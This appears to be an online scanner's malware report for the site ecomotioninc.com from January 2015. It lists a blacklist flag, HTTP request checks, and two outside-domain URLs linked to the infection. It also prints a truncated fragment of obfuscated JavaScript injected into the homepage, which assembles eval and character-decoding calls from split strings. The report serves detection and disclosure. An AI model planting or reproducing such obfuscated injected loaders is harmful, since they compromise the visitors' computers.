Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ecomotioninc.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://ecomotioninc.com/ | 200 OK Content-Length: 6577 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) c1z9e='';red6ef411='r9e37a1efb9';r9fe0c87909='r8b13708';r4bbbf=document;if(red6ef411+c1z9e+r9fe0c87909=='r9e37a1efb9r8b13708'){ rff8545=r4bbbf};rff8545.write('<scr'+'ipt>function r4fb3e6b(rb7a68824d){return ev'+c1z9e+'al(rb7a68824d); }</scr'+'ipt>'); function c127c4b23r582f915(r3cf3d93ff){ function r4b99d(){return 16;} var z84d='';return (r4fb3e6b('parseI'+z84d+'nt')(r3cf3d93ff,r4b99d()));}function r5fd2d94e(re26fad){ var r56159bd69ea='';r0782667046='fromCh';rd7d963610=String[r0782 Antivirus reports:
| ||
http://let-shopping.cities-worldlos.net/images/statlink1236148262UsjfuR8dt9.php | 500 Can't connect to let-shopping.cities-worldlos.net:80 Content-Length: 207 Content-Type: text/plain | clean |
http://let-shopping.cities-worldlos.net/test404page.js | 500 Can't connect to let-shopping.cities-worldlos.net:80 Content-Length: 207 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ecomotioninc.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 11 Jan 2015 09:31:36 GMT
Accept-Ranges: bytes
ETag: "367c0d3-19b1-506d5d41ca100"
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.6
Content-Length: 6577
Content-Type: text/html
Last-Modified: Sun, 02 Nov 2014 01:05:40 GMT
...6577 bytes of data.
GET / HTTP/1.1
Host: ecomotioninc.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 11 Jan 2015 09:31:36 GMT
Accept-Ranges: bytes
ETag: "367c0d3-19b1-506d5d41ca100"
Server: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.6
Content-Length: 6577
Content-Type: text/html
Last-Modified: Sun, 02 Nov 2014 01:05:40 GMT
...6577 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ecomotioninc.com
Referer: http://www.google.com/search?q=ecomotioninc.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ecomotioninc.com
Referer: http://www.google.com/search?q=ecomotioninc.com
Result:
The result is similar to the first query. There are no suspicious redirects found.